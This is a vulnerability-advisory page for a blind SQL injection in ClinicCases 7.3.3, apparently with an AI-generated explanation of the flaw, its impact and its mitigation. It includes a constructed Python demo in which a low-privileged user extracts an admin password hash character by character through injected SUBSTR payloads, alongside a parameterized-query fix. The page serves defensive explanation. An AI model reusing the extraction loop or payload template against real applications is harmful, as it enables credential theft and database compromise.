VYPR
Unrated severity · NVD Advisory · Published Sep 7, 2021 · Updated Aug 4, 2024

CVE-2021-38706

Description

messages_load.php in ClinicCases 7.3.3 suffers from a blind SQL injection vulnerability, which allows low-privileged attackers to execute arbitrary SQL commands through a vulnerable parameter.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

ClinicCases 7.3.3 suffers from a blind SQL injection in messages_load.php, allowing low-privileged attackers to execute arbitrary SQL commands.

Vulnerability

A blind SQL injection vulnerability exists in messages_load.php within ClinicCases version 7.3.3. The flaw allows an attacker with low privileges to execute arbitrary SQL commands via a vulnerable parameter. "Blind" means the application does not return query results or database error messages to the attacker; data is inferred from differences in how the page responds (content, status, or timing) to crafted input. The specific parameter is not detailed in the references, but the attack surface is reachable through the messaging functionality of the application [1].

Exploitation

To exploit this vulnerability, an attacker must have a low-privileged account on the ClinicCases instance. The attacker sends crafted input to the vulnerable parameter in messages_load.php, triggering a blind SQL injection. Because the injection is blind, data is typically extracted one bit or one character at a time, either through boolean conditions that change the page's response or through database-specific delay functions that change its response time; this is slow but fully automatable. The attack does not require special network access beyond being an authenticated user of the application [1].

Impact

Successful exploitation allows the attacker to execute arbitrary SQL commands against the database. This could lead to disclosure of sensitive data (including records of users with higher application privileges), modification or deletion of database content, or potentially further compromise of the application and its data. The privilege level gained is that of the database account configured for the application, which may have elevated permissions [1].

Mitigation

The repository for ClinicCases was archived by the owner on August 24, 2024, and is now read-only. No official patched version has been released for CVE-2021-38706. Operators who must keep running the application should rewrite the affected query as a prepared statement with bound parameters, restrict access to the application, review the database account's permissions so it holds only the privileges the application needs, and consider migrating to an alternative solution if possible. This vulnerability is not listed on the CISA Known Exploited Vulnerabilities (KEV) catalog [1].
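The mechanics described in the Vulnerability, Exploitation and Mitigation sections above, as a constructed Python/SQLite illustration added here; it is not code from ClinicCases or from this advisory. The vulnerable parameter in messages_load.php is not public, so the endpoint shape, the `msg_id` parameter, and all table and column names below are assumptions. The example shows a low-privileged user recovering another account's data through a yes/no oracle alone, and the same query as a parameterized statement, against which the identical payloads recover nothing.

```python
"""Constructed illustration (not ClinicCases code) of the blind SQL injection
pattern this advisory describes: a message-loading endpoint that builds SQL
by string concatenation, a low-privileged caller who sees only whether
messages rendered, and the parameterized query that closes the hole.
The real vulnerable parameter is not public; ``msg_id`` and all table and
column names below are assumptions."""
import sqlite3
import string


def build_db():
    """In-memory stand-in for the application's database (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT,
                            password_hash TEXT, role TEXT);
        CREATE TABLE messages (id INTEGER PRIMARY KEY, recipient_id INTEGER,
                               body TEXT);
        INSERT INTO users VALUES (1, 'admin',  'a9f3c2e1', 'admin');
        INSERT INTO users VALUES (2, 'intern', '5b7d8e90', 'student');
        INSERT INTO messages VALUES (1, 2, 'Welcome to the clinic.');
    """)
    return conn


def load_messages_vulnerable(conn, user_id, msg_id):
    """Hypothetical vulnerable pattern: the request parameter is spliced
    straight into the SQL text. user_id comes from the session (trusted);
    msg_id comes from the HTTP request (attacker-controlled)."""
    sql = ("SELECT body FROM messages WHERE recipient_id = %d AND id = %s"
           % (user_id, msg_id))
    return conn.execute(sql).fetchall()


def load_messages_fixed(conn, user_id, msg_id):
    """Fix: the same query as a prepared statement with bound parameters.
    The payload is now compared as data against the id column and matches
    nothing; the SQL text never changes."""
    sql = "SELECT body FROM messages WHERE recipient_id = ? AND id = ?"
    return conn.execute(sql, (user_id, msg_id)).fetchall()


def oracle(loader, conn, user_id, payload):
    """The only signal a *blind* injection leaks: did the page render any
    message or not. In a live attack this is a difference in HTTP response
    body, length, status, or timing; no query output or error is shown."""
    try:
        return len(loader(conn, user_id, payload)) > 0
    except sqlite3.Error:
        return False  # a generic error page also reads as "false"


def extract_blind(loader, conn, user_id, scalar_subquery, max_len=64):
    """Boolean-based blind extraction: recover the result of a scalar
    subquery one character at a time by asking yes/no questions through
    the oracle. Returns whatever was recovered (empty if the loader is not
    injectable)."""
    alphabet = string.digits + string.ascii_letters
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            # The known-good id 1 keeps the base query true; the appended
            # condition decides whether the row survives the WHERE clause.
            payload = "1 AND SUBSTR((%s), %d, 1) = '%s'" % (scalar_subquery, pos, ch)
            if oracle(loader, conn, user_id, payload):
                recovered += ch
                break
        else:
            break  # no character matched: end of the value
    return recovered


# What the low-privileged attacker goes after: another user's credential hash.
ADMIN_HASH_QUERY = "SELECT password_hash FROM users WHERE role = 'admin'"


if __name__ == "__main__":
    db = build_db()
    low_priv_user = 2  # the 'intern' account, logged in normally
    print("vulnerable:", extract_blind(load_messages_vulnerable, db,
                                       low_priv_user, ADMIN_HASH_QUERY))
    print("fixed:     ", repr(extract_blind(load_messages_fixed, db,
                                            low_priv_user, ADMIN_HASH_QUERY)))
```

Note the shape of the extraction loop: each request yields one bit of information, so the cost scales with alphabet size times value length, which is why real tooling switches to binary search over character codes or to time-based oracles when even the true/false difference is hidden. The fix is the parameterized loader alone; no input filtering is involved, which is the point.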

AI Insight generated on May 27, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products: 2

Patches: 0 (no patches discovered yet)

Vulnerability mechanics: not yet generated for this CVE

References: 1

News mentions: 0